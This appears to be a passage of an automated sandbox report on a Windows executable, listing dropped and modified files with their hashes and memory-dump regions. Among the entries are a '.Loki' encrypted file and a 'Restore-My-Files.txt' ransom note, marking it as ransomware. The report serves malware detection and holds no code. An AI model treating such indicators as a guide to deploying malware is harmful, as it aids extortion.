SHA256 52489132b344860bef97cdfaf8bb2e20c11c9924f11567cd021f77488afd164f
SHA512 056f169c83594074fea4832230a043f60d1df422e2f9d0dd80585e098ba9a4883db03900c2f004634669cab004130e9eec152845f0aaa5bd70ff25ca93ee7e92

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000079

MD5 b15fe82b3220751c7563df73e9e6fbc8
SHA1 5933edf186e8595438ab8a830b863b65e35e9e37
SHA256 709b480ac69bf8352991fa0483d563e132cc5806429e3eaed8c3848a2b1bdd9e
SHA512 c520ec05edf481dfac365bb075d516db056f076e55a8c298a20879e519a14050578950c1c784126e62aaa3592b42d4b3b91bb76c0e6e0fafddc21fa4d754919e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000078

MD5 c6334512044b038e1299c4edd3654bb7
SHA1 490f7cd5c7fdd875227c49344de31a2ca58f9335
SHA256 3724e559397032d8851ed76802b57fe479e56925d63e5d760aff536b9249df47
SHA512 b4c9d98a802525ee82dd8a0de6f07fc77c0243f7d001aca5d54b2ec71325119be45aa4e1ef5d1d035d6237ea9dcf2c976fa170550942c50b568326157d7bfd7e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000076

MD5 95557604f5c940528a96a3f222ed447b
SHA1 d71a1f8ac521bf512534775989e2954a8ae1e30e
SHA256 cec305b4818eb5f1d329e5caab68572f55167832c41c9e2db4e56b13b228c549
SHA512 b84cd0ca86afac23fb94ed5f2efc4cb465fdd016f457c0882bcb76d40927c49c4f9a21fdc575cf1f9094e858b0dcac6d4762f8aa90aff1a144757a4ddfb209db

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000077

MD5 21f277f6116e70f60e75b5f3cdb5ad35
SHA1 8ad28612e051b29f15335aaa10b58d082df616a9
SHA256 1537b0c18a7facad4bdfa9ae3ec84095c91467aa5cfc1d8af2724909703c2fe4
SHA512 e619f92b1ec91e467e4b11d5ad25c99b62c7216f9da81c159ae0c9ef3f9e75f48dde7bad09ee38727b5a14b827f3b813c196504057708cbfaf4bc67dbd032816

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000075

MD5 99fe785469af3a2158d055557553dbaa
SHA1 bed205f0208ce76c4bc23dfec01a8358e5ac2358
SHA256 719d53b7bfbe95b9ac69fc4f725f3f2b95d4bea514017f156bdf83651a61e76c
SHA512 d51231a4b0c41558fd2d08ded4ead473c3258932eac4ef3ee9c7a06d8353e1cbe2202e0f7d24e110c1d36e40615292e2ac8fc0218b5b0e6d0242a9cbbc6df519

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000074

MD5 b78c208c87201efefbde1b05e311fe3f
SHA1 438bab4f023ecbc7d3d136b01966930823587804
SHA256 f6c6a469101626531293f2a4c594e86f5b8a620b9d351278d10b061e6b2b62fa
SHA512 09dd8ee68af111edebc0826a1de3bb525607828c97c377da2098522c2218bcbcbdf2eac6f58296409100a5985770f524fe5ce53fed3f6baa119b0c0eeebe1720

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000073

MD5 bc60deb3c0273dc1fcb96748b86b2302
SHA1 960a5e4c41504a6f3b078e90be539ef0e0eb8559
SHA256 631d382e3a0c3efaff4cedb1ddbf6d55ff983e745d8f7b64077ca858645a7b64
SHA512 3853e8f5fd2dd3a5c6ac68bd1de6ec0bb627086eea2c1bb94d9ef97be63976906bcd7646ded25e1dc681a7b1b77267f5b7605af4b35911e10f8a8323f277a8d0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000072

MD5 d5311606e44c38667e6d7d5ee72d02bf
SHA1 6146ca7d1265ab5c81d22ebc6193b85bc690a56b
SHA256 925ebef57b78e5450509f6b2789034ce27a11c60fe8dab2bcf7616d06fcdf1d4
SHA512 5741c3daa0dabbff64b7f60f8a42a7c1a24d1b3f8a5811864b4aea6305b3576fc1016bd8ddb579795a7e088048e603f617f7ad697b1ded783580703b670b05e0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000071

MD5 661aadab70ecc81d1eeb60ecd2f476da
SHA1 8680e320b8f132c9aed285f31b4421c6968dba36
SHA256 31597241b0d1dd67ae5cbfaf6ea6cdef7352798f53cf11559376677a5d14b6dd
SHA512 a8a0c759138cfebf324a70a677ac17c0568a509e4fb5b6108b5f9d353d972ef22f70e2a260768825b62dd16d28acf30dd4fee03ed115697f16eee6a9ee996006

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000070

MD5 a5045af58ba9e9915d288536a24a7ff0
SHA1 1e49d86360ef29d6099b0d33089e7f024ad1d4d8
SHA256 b287474ffd57c38bc1dc843cd053bdc3408cc399eb132f30918c8cb152263da5
SHA512 4a819eb0e1367d2f61b2151deefb7f71b28841873edf70de1e3fb6030f6f32899ee1e4aac804e2293723f86c9fb111ff1845a60888dc8f343605417902f949a5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 89cc6e44ae28028dab1045a4fa4c2615
SHA1 a3534bd94d12b122e34e6c10867250dcc02216fe
SHA256 21b6280eaf2a555fd184f5f0e17dbd45c9302c517cf4d1a1c10858ce2a513597
SHA512 4e4961d1afa053250d90e484a280db62795cb28619295e022e5681ebca1c147bc83b682f3fa60a40056fdea620560997ce3640048727b6ab9ac83af99be3a267

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old

MD5 950c4dc65b3ce1822f957569307e46e2
SHA1 7735cb185bafdc04650731375c711d5affe613ae
SHA256 9496a3f03f7d36f1b9b4a15e6a5e91f347794a7798550f15faefe2ee0ffbc75c
SHA512 0dc2d7394030c298d357867a5307c4c65a7c3eb237024c035a257dc6882537a57d1225c73256977d8058ac8d50c2796e555e8ca0d6f5ecf7e3b84a41cd34cec4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\69f90508-8154-4dad-a013-a19944dbb265\index-dir\the-real-index

MD5 3fa4b6a415b3b9435037ff2369c012e2
SHA1 50a4b3737afca4d115be23cf3ad202f5a6ac6f40
SHA256 538f1a9bb57f3d250816089e4f37261315c5d08ec34f76908a16170eab7733c7
SHA512 8bee72af2e3ce48497c9e07be643aa466f4ba815ae9c3a5c2bb8395100c04ba9ef85076af6df55603c309f0c4f517259578bb31e2084d2a8c397d33595f8ce26

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\69f90508-8154-4dad-a013-a19944dbb265\index-dir\the-real-index~RFe5c0f78.TMP

MD5 920a6f5f6ba1b98fe097f1f3b0f867d6
SHA1 77a4cd99184bffc4f0ea1653a74b362538d84053
SHA256 4489b8d494f7b2fcd19aa711b61c29b51da93e49c19b02daad71ac40b81fa657
SHA512 22f58a18ae58b50c27e7b73884eddf1c8b50f8bab16eccc7aab16e51afe874fb700cd878f9e95963eaece0acd39bcce6817eb7904cb550dfe098bd2cd2928347

C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.zip

MD5 a0799727a276e582beb80c84ad0614a2
SHA1 aa9c882aad352534b2bcfd6109c21f75773eb0ff
SHA256 99ce27923235a7b3161085f6cc457c3ffd1e6d35beed521d456dbff3958cdc2e
SHA512 d9b9cf823ce8dd49b52cd50fa74e84046abeb5e4c62b17ad5995cbcbf12ff8c8f8e6d49d77df34e517e646ab4e70adbca37d892674d22c0d246db0ddf3a092df

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 0e0f738603d105f361a3d9602d9a0ac2
SHA1 8cb152597e274e2621efcf8639093f10b58c29b7
SHA256 bb54d79061ab9e6516234c0e6fe56a903daf3dda6635ebd99dc31b5e1d8cf0c8
SHA512 7903153d6ab1d277d9cd7116b4bc2132f4ff47915ab65fe6a639df018c00313b8a6cb18c9af9def140c8571eccd1d980a55f1ac21b114e8cc571056c9095d3fc

C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe

MD5 d7d28006e0679b1f2ea0a87ba94f4af0
SHA1 675f7b9185ccc3241650ff2fd96f5e1a0bbf63ee
SHA256 e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3
SHA512 b3f9257825850e4f2920d05f45eece26323d81d06a761fa2e5b2d154535d45f996a316e238f2d29fb82081a133dfd5ad304835317e65fa72f9fc2e1acbfce03a

memory/3916-1021-0x00000000000C0000-0x0000000000148000-memory.dmp

memory/3916-1022-0x0000000004A30000-0x0000000004AC2000-memory.dmp

memory/3916-1023-0x0000000004BD0000-0x0000000004C36000-memory.dmp

memory/3916-1024-0x0000000004CA0000-0x0000000004D16000-memory.dmp

memory/3916-1025-0x0000000004990000-0x00000000049B2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt

MD5 b590abd0b390b49bac4be36d8fb68740
SHA1 9cab950dcbf3c2aaf8de7f008fc04423f8f660cc
SHA256 cb55950c181f7521e0769b20e55dbaa4a78b3fe79612b36c562beddbd11f84fe
SHA512 8990e15dec18bfd1d278e156e85779f1ffde21bbea131f1d85cd09534d176074eab4304e7e4b4615b688e23bb4c0ff9c5166af11071d9770deb95f6cd13025ca

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\MANIFEST-000001

MD5 87cfa534d6c8606300b861523a62462f
SHA1 2d9d1e4c86687d9d1c17e59f8c6bdd8724aa8a2b
SHA256 389d0755f233b2233d26bd4290bc2a3cf799435f8c237fac58a48b0da7d79c74
SHA512 22771f4fb07fce8013a9cefc2850c5efb5ec2152df15078ebb9c6426332bbdabab3025f27639efae67d85fb7b6d5eb9a4565c14c6d5bce06c617a1a7d59c19cb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 0f990f3f5d0ce0bc99202a75a53252d8
SHA1 0c79f0038c1176c1d4b2df80436e4bf49a35c005
SHA256 71a1aff9ea937b52e0cab766e500d73f535afc13f91cec3f3be6837566e487ee
SHA512 267f3879a705189f82ed8248dbcea25de2fc97cccd0e0d09fb56c56c9408c4ca60db055337895ebda970205ffdbd8332154388c9b58fcb5849547ad9c429e698

C:\Users\Admin\Desktop\Cpriv.Loki

MD5 81f3e3bb7af0f37cb25c6ab65cefc93e
SHA1 192744a605d6daf9a3071eb281a66ffae80ccfe5
SHA256 dca35bbc1f8f0cdae39a7bce5308f734075014733e7d836c124e04688100fc14
SHA512 1015d5a801708a032353b12ba336f2a5bb58232e580a5d14b2054b0ce1a909ba489b3ad35242e3dffdd64d0aebe74e745fc289ecf2614a0269ad08d02cc3a8f6

C:\Users\Admin\Documents\Restore-My-Files.txt

MD5 01f9546a63a8ed98fe2a82337c7f83a8
SHA1 2ad88af2e71d178f4d4365eacf34ff2fb1b3a754
SHA256 81cb5d9a4c8ecbbedb2e363e2ae175dd7160359138c8fd1e32c0e05d8f3a689d
SHA512 b9eb550a014781abb8f688aec4c37a9bb7dc721820047eb3f732333aa424c208d9529494c4178c074a0aa342116c3f553ea76bf11745a0e9dcc0aae9b04d34de

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 a2fc5ecd334e979ca7d4854625f02ea0
SHA1 42373180dbc1b073a6b7479c4038ee9017e056a3
SHA256 75dbbe7d43241cb430a32a6156575dbf7539a852bdc51d43ba45e2e98ddf4c72
SHA512 7c3244ee4b62b88cc106cb3fbd3d4edbec8b7fd29ec1f587e2a75c21a38245d98c666a56bcec97c5ac7a9d93422a4449a4eebd8281fb9d4eb4f764634045a60b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 2ce1d5c928da27d94c303454ca3fbfc4
SHA1 25046db9f62f5233443e8de2557e96a01fdda8d8
SHA256 817f74bc6a58904ec442de1ff289f2ec947897630dee11e53c018a36348b1c1c
SHA512 48c809ccecd6ae18417c989ca590180eb7d15574821e8f9924306bddd03bdbc9c834e9dfbbba9156986e1544410674c61d558978c744da2f543a610e2b4cb36f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 c70123e1fbc074185adbc723217c4911
SHA1 ebd3fb901d2f059521e76f639dab346000dde629
SHA256 8fa71d30d977d4df61945fb24a9400a2277dd76d8a4d51e988cb1966fde4e74f
SHA512 18aea72a1353a69e7d60ab45e5dcea2c18204d6cdd0c8d4b3e9cbbbe948948e435cc89e9695e3aa053529d568345ed06581beedcc668daadfcb3006791d86fc6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 e4318913f882c8f425f86691bf29c799
SHA1 bae73455a61116355cdca8e0004f779873f19b5b
SHA256 b933bc7f5a239ddbeb5bf944df748aab8b239b40f5fb7180fff124fc85e2175f
SHA512 9f0bc9bb44f9ca7b0d6349140630392e5a5ae188dfd859b09fe72c676cda21d53fea7191e1e3c1725e6373bb6d2d476f291770769121c31e59662bc3935da654

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5d8a60.TMP

MD5 65d662811bb4d2aa0308f70e18fcf0a8
SHA1 515315cf8f667f08522aa7777ad2ee395dc11db9
SHA256 9acd12bc723233a1be6adecc153f35de8e56b54911a80071e37d0c58c12115a9
SHA512 349ef11e188f6e6fa70b9d1ed38fc2054599535d080a751e8405f53b38b694ed272debe87ce03339003b402f3c3fa7e5b844cfc42d6c7c9939c9885416677adf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 a6c3e6f20673997186d939508d2a216b
SHA1 6dfa98c97fb9939e544356de78cab5ffc1f405dd
SHA256 25ffbd929c8efc71b1ff2e1a121823f968ca4502426d4711eb5bfb7120e025a5
SHA512 2aee54336d7ca6f5ac5ae205174bd7596eacd15542cd0adc5544f89fddd6ffadf3baa9b13c233e7319a5d526be120ad406509467c83909c62f9736dc9a507afc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 45c62c0268a5859c85873d5dbc5e7903
SHA1 d6e7f81f821adc3c6b2bae5ad38f6c786fce17ae
SHA256 855bae8071de2370eb5620a1f52759eb77c5ce891d837047fef045557285a14e
SHA512 0332a10e32a0124417a611a0742f38dca1ae1c46a26c5905c320b77b8a9c5fd828b3070d556d18a6506115fc4a6082422d660513d0ca652e19fd3dd03a9258b7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 b9feb557ff933ac812161b171c05b9fe
SHA1 2fc02b705fdf5c0eb2e1014b29e8c0a07526e110
SHA256 7877df370735741a73d54022299a743b962166a071b8adb25dd1cb6dd1a877f8
SHA512 1daab7c365242537515d84d354c12670d7ea02b71833c360168606dfc116d52e263c5c8aba38a7feefdc1ea3e4e04d4a6cb4607bc40a860beea4382951c1f44a

memory/6088-6032-0x0000000003530000-0x0000000003531000-memory.dmp

memory/4828-6034-0x000001E466970000-0x000001E466A70000-memory.dmp

memory/4828-6052-0x000001EC68790000-0x000001EC687B0000-memory.dmp

memory/4828-6067-0x000001EC687B0000-0x000001EC687D0000-memory.dmp

memory/4828-6066-0x000001EC687D0000-0x000001EC687F0000-memory.dmp

memory/4828-6081-0x000001EC7C000000-0x000001EC7C100000-memory.dmp

memory/5984-6136-0x0000000002E50000-0x0000000002E51000-memory.dmp

memory/1000-6140-0x00000274AF000000-0x00000274AF100000-memory.dmp

memory/1000-6138-0x00000274AF000000-0x00000274AF100000-memory.dmp

memory/1000-6151-0x00000274B0480000-0x00000274B04A0000-memory.dmp

memory/1000-6155-0x00000274B0460000-0x00000274B0480000-memory.dmp

memory/1000-6145-0x00000274B0440000-0x00000274B0460000-memory.dmp

memory/1000-6139-0x00000274AF000000-0x00000274AF100000-memory.dmp

memory/1000-6185-0x00000274C2D30000-0x00000274C2E30000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\0DNSAWKD\microsoft.windows[1].xml

MD5 d4cbe0d7270f245ea26901600f94e7d8
SHA1 74849b6bfbe0669c78bc0f58516b36371420e329
SHA256 78fe35c88d92335c319e14e6f4d5bf5cf161945bbf5f61dfda26dde2ded7e720
SHA512 7bf464acada98a283a60f392d494c20a001c5e1a6790d8f62472eac1dc1f6ff71435b94a94000c13ab27275c0511daa3a50d3ffd237059936fc946f51836a50d

memory/5464-6236-0x00000000028D0000-0x00000000028D1000-memory.dmp

memory/4272-6239-0x00000299EFD00000-0x00000299EFE00000-memory.dmp

memory/4272-6238-0x00000299EFD00000-0x00000299EFE00000-memory.dmp

memory/4272-6237-0x00000299EFD00000-0x00000299EFE00000-memory.dmp

memory/4272-6268-0x000002A1F2060000-0x000002A1F2080000-memory.dmp

memory/4272-6269-0x000002A1F20A0000-0x000002A1F20C0000-memory.dmp

memory/4272-6270-0x000002A1F2080000-0x000002A1F20A0000-memory.dmp

memory/4272-6284-0x000002A1F5770000-0x000002A1F5870000-memory.dmp

memory/4200-6360-0x0000000004780000-0x0000000004781000-memory.dmp

memory/4044-6364-0x000002761E360000-0x000002761E460000-memory.dmp

memory/4044-6375-0x000002761EFE0000-0x000002761F000000-memory.dmp

memory/4044-6395-0x000002761F500000-0x000002761F520000-memory.dmp

memory/4044-6394-0x000002761F7B0000-0x000002761F7D0000-memory.dmp

memory/4044-6409-0x0000027631DB0000-0x0000027631EB0000-memory.dmp

memory/4044-6484-0x0000027631AD0000-0x0000027631BD0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\datareporting\glean\pending_pings\ce5bfbb3-75a4-4225-a634-04beb4c7a324

MD5 0369441e9a2d9e3fc6e1d0f9a6d6a716
SHA1 98c17ccd2e27ab493c5f6bb027e81e92cd33dc7b
SHA256 e98f7d45c0ba92b683ea1e342396b01550531950f3b189d83523ddf2d34b735f
SHA512 f258181040f4dc825cd23a280fe65c3ab71740e7eeea2004f00eb2814596f81c9d19f824b2329e3bb90381ef890f7b004d4951703e307931af4d32dfe4afbb1e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\datareporting\glean\db\data.safe.tmp

MD5 d46c5c54629d7bae0545a84b4968d8f8
SHA1 f77b233157ccea73521fae013225e49bf82ff494
SHA256 b8705a66c208ab304b1903eb4d1edab56cda251bed19f74fcc48d25ef76d3173
SHA512 fb69d1a436513e90210c288cbec4e1e27b88f7f5cdb7238f408293b920c3b9defc867387cc868d366ae3fed41891bfec10c9c695455a143ebb8c86160f0fc800

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\50jftte4.default-release\activity-stream.discovery_stream.json.tmp

MD5 e04f581bae8e930af08c80a07cbc5697
SHA1 b428d9c9e88404cafa605a1aa0d5161f6755e149
SHA256 af3df915b52d01339e5bb04d6cdc57dc3cb4dccd833e6c091dce8b910e6d74e0
SHA512 e0d3a12388a4ece7bda60202e1a5488fdda509ab1b564e4a4d653b8808e22b917c6bd3da3e7adf6166f249d948c31faf07f55ad1bd4e1589bf93a53d257cf06a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\datareporting\glean\pending_pings\76ebbd5b-640e-442c-8581-1f0ae9f6a23b

MD5 14856bb13c7aa2dd8c2c4b231e54c3ce
SHA1 1d12671c90d475708a10f65011fd9aff8a7cdc24
SHA256 aa18094595d2a67a2ac0b6724cd50db35ed062119ab125db01509aa48b56cf48
SHA512 f1633efd0323a7f96550843ea96ceb3af770b35f2a57d97ffb1d18ae3aa79c1c6e0cb90f470df7329c753a5840eee6ecc6dd659262e575644039914b5bdeed4f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\datareporting\glean\events\events

MD5 7c78a6f2b8ab2b48bf552a1a2803ccb1
SHA1 e2b156e211daee66d16ad3662cba8654c0c727e7
SHA256 4a2358e3cfe7cd6cb353a4bbc9910fd63ce4c0d1596cfd4ca5df3643270a12e5
SHA512 5dbc2f50f5603a921c0face71f26abaa1a6a1866fdc4c3fdbfe3bc9ca297ebd3a6cb88094eebaa914e5f82d07cfbc78b6205c288bed7d1bf908072626ce330ee

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\datareporting\glean\pending_pings\7da26bf8-2c75-4e5f-9c43-76c1c5332619

MD5 9c9ee735e976b70b11b5052883f80e78
SHA1 7956fca2cd8340489fa1279f917710541bbe3ab7
SHA256 81bb50205586385721c7496e9d5007972e726292aa64212e50b13d3e11231902
SHA512 990c40032be34510dd4e7f31e496b7ee3c60010715520d8b3880509a565fbcc013a97c3cddc764db2835ca4f615f172dcc41adeb423288a9f10352a1ad2d5f27

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\datareporting\glean\pending_pings\7a9b962d-3cc2-4a4a-bf49-aaf70f938189

MD5 c52e732f3584019d6c2e40713b55499d
SHA1 ed21955478c64fef773270704849d165e6a1b2d0
SHA256 2fa9ac1b9c9c8beb47058e612bc828ba1093897659a68a4df04af694ab46216b
SHA512 0a213614f741840929767a559d51dc03f6b7ebd238f1c175aea9047bfcaa1efba62b8356f7bc84599767309144961c2c2dbc09db2470ea90d8162a95ebca761d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\datareporting\glean\pending_pings\6b758260-38f4-40ef-ae5e-fb3aacbabafc

MD5 168dbfe1a1de150ace50dc0e6d584a16
SHA1 3934767503c022e96d72a332b885ee432040b556
SHA256 a755e70fa8e5cbbd69c94a555a1086e9ef69871e69bd6360cd703acad46f3616
SHA512 715dcda5085ca4848de67f2b031e60aa9f76b6e3d696bb7818ae7d2fce02d8d6acd0c2e273d12ebd06fcf54871053530855da0f570cfa269ce9415e8aea13b58

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\datareporting\glean\pending_pings\642b5765-2dbe-4729-8b3c-e2550d693c21

MD5 6849b9548d52ab16cfd34dd2c9b3ab4a
SHA1 17bca104364692235ad7e5c8813204e95fa7fc69
SHA256 5f2a5f589226c770e5e65a6ea8238a02951004553df1bfed39b6eeed4b97a021
SHA512 a26c0a031041f06709ae1da345d4420b660191c28cce1f8107e629c73805df1109e810c3238189e7fd9491f56589d8525df5171288d9fe5f84f45eed00170040

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\datareporting\glean\db\data.safe.tmp

MD5 091f48122a2933d78325e7654dfca811
SHA1 857374a37da4a612613e4c45818cd4ed9625e7a6
SHA256 ecdeab692a4a094cae2d2d7fb3e0d2be8b798c346950fddd02b0d0db319c4fc3
SHA512 f5cd73a0607181291f4bed7d60764d386559aa57b880e01050014bcd5e8ff556d0f5c24021c142870bbd13137cd6e0238a9c3f6854355b0fb4867c9cd75e71f4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 58788450f75f871fbaeb5fec7657ab08
SHA1 c0a7c3272e1ca87f03918046f80bf7d82d020f95
SHA256 ed2be0ee6243959c65f418f056a7d25eca695c7c34450452d05e7afb233c77be
SHA512 5f3f1b93038d27d41bdcf9e7d507b41fd33eb4ec9f0791674bfe0965837ad61213f12d22de72f3dc3250e231fd7bdb412f36b7891ba24b6ea77c2661d199ceed

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\AlternateServices.bin

MD5 760f37666b065ccd6a417d6cd9d6a15e
SHA1 8dd1711addaace8b34b2b4a808cdda3dd16befa4
SHA256 d1ed2fe43a365179c094d1d7eddd61777b642b18d4be0d3c5e7595149e9554ac
SHA512 26b7f85c0364ada76cdf28935ce6415057d370f179d28c114920af4c40ff84a338911338f7a8aade077c7b5b7f09394488adb9c9d6b1156a0c825b419b74ca3f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c01fe6c1a10f0a96abf0286d6568950f
SHA1 cdfb3cc4e31fecaba651a934460166d2c71af5fa
SHA256 c96e178815e88d67f5ad98147028a24fd4d6c0b4d0a72529bc875dcc00f854e7
SHA512 42d9ac5fc6f7931912e1e6e26350064cf4f96fdf16fb0db134d117206b7ed76c3978042d088540432d0dc8a11f5537b719bbf9077943821c0816a48a477f25c2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\prefs-1.js

MD5 485b014f1b16f695a0ea33ef9655a342
SHA1 73a439f8144ce40fbd8b8d3a486560e843d70018
SHA256 bd902c8438cb6992a7424b4e5b81cfcdab16dbb52a73cad43b4b88dc2343267f
SHA512 7b5c2c185c63bd6c7d0cb78c1563499604b9dfdb42f112e7cc3e38a6156e8872358de45067be324ae3eef19c1307fd5778a2b28217917d2c43426b693d3cf062

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\sessionCheckpoints.json.tmp

MD5 362985746d24dbb2b166089f30cd1bb7
SHA1 6520fc33381879a120165ede6a0f8aadf9013d3b
SHA256 b779351c8c6b04cf1d260c5e76fb4ecf4b74454cc6215a43ea15a223bf5bdd7e
SHA512 0e85cd132c895b3bffce653aeac0b5645e9d1200eb21e23f4e574b079821a44514c1d4b036d29a7d2ea500065c7131aef81cfc38ff1750dbb0e8e0c57fdc2a61

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\prefs-1.js

MD5 b9485aad1455a99bf8ef9c2259ebef9b
SHA1 c1ebbeed84e969db0652d4521d0eb2d4edc3b41e
SHA256 0baa4438229d7505c3bc95664fd9f2796ada53cabcf37421b1d31179b1185390
SHA512 a10e2009647a11f3af4766db51359db018dcec3fd8069d1946ed212c3b661b093b71a774015b84b12a22f6f6182a0fc1bf23d4531ef313cd97a9138f08f6f7ab

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\prefs.js

MD5 44435cd745f11c9006e3f9802711960a
SHA1 f2a6324886b44ce7afbf1c25dec042685ae3c91a
SHA256 965a57a82458571c95a084359603a477e04e1aae7308fbbdfa9360647c857250
SHA512 53b5d6b0bbd6ca840657f5c505c1ac30246dbba88ae9537feaf9d71760c50f07c874cc82fcd563c848713473a9f0f7a9f03566e013f02128e0446aceca32da9b

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133895706702730727.txt

MD5 d00683fb34dd1f20d42c6f52133048a8
SHA1 eed0ba25b7988f789673600f203cf3e25aea4634
SHA256 c6a19181777da094758bb94e9d8de7dcb6d731d0a626fe6f021a078265df6c6f
SHA512 68590417b48a37f3fbeb3303bb880b668dcfb27f91be79d71aa47aad1cf3108bec7fe9ceb497024882063a89eb90d8e1a17d02368a74f03120ab1fd70a99d6fc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 9df7e7b56aaf435389d8fb6e6bfb51b4
SHA1 779df2bf57cc7139fd2a55a2e4414d85256283e3
SHA256 a07312a655c1bc7b7cb9df8df8d3bc033ed494859e02ee1f9f80430d292e2fd3
SHA512 822a0fe692f3a2ad04dd430b4427936a83338f747bc9b602007363083af8fbfdd30e41d79a6a2cd7550d862ebfe9b2854b72a10ec414b6f7703750fa0af2342e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 80be741eea57be5f35838c6eb5448f23
SHA1 9973dca11e7e5bbbfbdb5aa30b174db3e91b36ed
SHA256 d2beef110e45c24aadcb69551100adc28e8d9b18bc84766fadedec7d7855546f
SHA512 3de74966670e077eaae9c72f57d7b5546255d48713430690f20d096f82ffeecaaf5a24791502320c0699b34835e96325d292f7b6664dfe513424d224059671ce

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 352dd23643b1b0b270df6463d41a71f9
SHA1 03ac093f9b80c6caf3be0d1fe3bfb80d921316ed
SHA256 75a1a78e4e228dd5646208b2a442def1dae93a0ca2ee25861e4436e2205cf295
SHA512 cc7c56a63ea202cbc21dff0afca0c1f11ac11c59e552302f4094b7fc3d5a1b7ce72b40af0c30ffcf515cfb20160a6baf7cd92c827cbe16eb28a1ab4a0becee0e

memory/4200-7115-0x000000000BDC0000-0x000000000BDC1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 d004f43f9b24af5357cdc360715b78da
SHA1 4b9b92c67ec7724e9f4fd009ef0c73f931cc4654
SHA256 fd4ac8ada93ec2138c4159957f1ceb7bc29b8a40f97cd0e60538c03abf6e05cf
SHA512 fb92c47e8ad1d7547a2bef54a934806390d62625259b7ccf0d7d679d0ce49122eef2ad4457b6a31089d5dcd0f79d3e03ceb45a7e658ac87b57e1bb87241b58b1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 f0dc5cb8128b4963a9ca7ea2848bed61
SHA1 5ea0204c18d2a6116f967b761159937387e9d2ee
SHA256 a4cf85a6d8a4f1a4f439dd9fc91dadd09f2d51a68a3d69cd7ae1e5563d57cbd0
